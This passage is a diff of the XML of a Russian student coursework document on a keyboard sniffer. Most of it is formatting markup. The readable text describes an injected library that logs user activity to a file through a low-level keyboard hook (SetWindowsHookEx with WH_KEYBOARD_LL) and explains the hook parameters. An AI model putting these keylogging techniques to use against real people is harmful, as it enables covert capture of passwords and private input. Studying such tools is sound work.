+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>4.2.2 Инжектируемая библиотека</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">При запуске поток создает именованный мьютекс, если мьютекс уже был создан, то поток завершает работу. Далее поток создает лог-файл в заданной директории, в который будет записываться информация о активности пользователя. Устанавливается </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>низкоуровневый хук, для отслеживания нажатия клавиш.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2441,22 +2753,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>файлами.</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3115,15 +3411,38 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Листинг функции </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LowLevelKeyboardProc</w:t>
+        <w:t>Листинг</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>функции</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LowLevelKeyboardHook</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3672,6 +3991,8 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
@@ -4230,31 +4551,33 @@
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
           <w:sz w:val="12"/>
           <w:szCs w:val="12"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>{</w:t>
       </w:r>
@@ -4279,22 +4602,25 @@
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
           <w:sz w:val="12"/>
           <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -5175,7 +5501,7 @@
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
-  <w:abstractNum w:abstractNumId="0">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1BA963B6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F1C6DF66"/>
@@ -5297,7 +5623,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1">
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="213105F8"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="66925C16"/>
@@ -5446,7 +5772,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3B9C1A0E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="87C2B492"/>
@@ -5586,7 +5912,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CC972A5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="EE0A7D28"/>
@@ -5699,7 +6025,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6AF50F13"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F1C6DF66"/>
@@ -6858,7 +7184,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5894DB58-3E9F-4B8B-ADE5-E56A91755735}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1ADB4ECF-1CFD-4959-ADB1-6BA976634ADD}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -2640,7 +2640,6 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">.2.1.2 </w:t>
       </w:r>
@@ -2820,7 +2819,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
+        <w:ind w:left="360" w:firstLine="348"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2833,6 +2832,342 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>Данный раздел включает в себя описание основных методов программы и их листинги.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Процедура</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> установки хука</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HHOOK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SetWindowsHookEx( </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>idHook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HOOKPROC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lpfn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HINSTANCE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hMod</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dwThreadId</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>определяемую</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>программой</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>процедуру</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фильтра</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (hook) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>цепочку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фильтров</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (hook).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2849,166 +3184,57 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HHOOK</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>SetWindowsHookEx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">( </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>int</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>idHook</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HOOKPROC</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>lpfn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HINSTANCE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>hMod</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DWORD</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dwThreadId</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>станавливает определяемую программой процедуру фильтра (hook) в цепочку фильтров (hook).</w:t>
+        </w:rPr>
+        <w:t xml:space="preserve">idHook </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">[in] Определяет тип устанавливаемой процедуры фильтра (hook). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>В курсовом проекте у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ся процедура фильтра (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WH_KEYBOARD_LL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, которая осуществляет текущий контроль за низкоуровневыми событиями ввода данных с клавиатуры.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3026,56 +3252,14 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">idHook </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[in] Определяет тип устанавливаемой процедуры фильтра (hook). </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>В курсовом проекте у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>станавливает</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ся процедура фильтра (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>WH_KEYBOARD_LL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, которая осуществляет текущий контроль за низкоуровневыми событиями ввода данных с клавиатуры.</w:t>
+        <w:t xml:space="preserve">Lpfn </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Указатель на процедуру фильтра (hook). Если параметр dwThreadId равняется нулю или устанавливает идентификатор потока, созданного другим процессом, параметр lpfn должен указывать на процедуру фильтра (hook) в динамически подключаемой библиотеке (DLL). В противном случае, lpfn может указывать на процедуру фильтра (hook) в коде, связанном с текущим процессом.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3093,14 +3277,14 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Lpfn </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[in] Указатель на процедуру фильтра (hook). Если параметр dwThreadId равняется нулю или устанавливает идентификатор потока, созданного другим процессом, параметр lpfn должен указывать на процедуру фильтра (hook) в динамически подключаемой библиотеке (DLL). В противном случае, lpfn может указывать на процедуру фильтра (hook) в коде, связанном с текущим процессом.</w:t>
+        <w:t xml:space="preserve">hMod </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Дескриптор DLL, содержащий процедуры фильтра (hook), на которую указывает параметр lpfn.  параметр hMod должен быть установлен в ПУСТО (NULL), если  параметр dwThreadId устанавливает поток, созданный текущим процессом, и если процедура фильтра (hook) находится внутри кода, связанного с текущим процессом.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3118,19 +3302,477 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">hMod </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
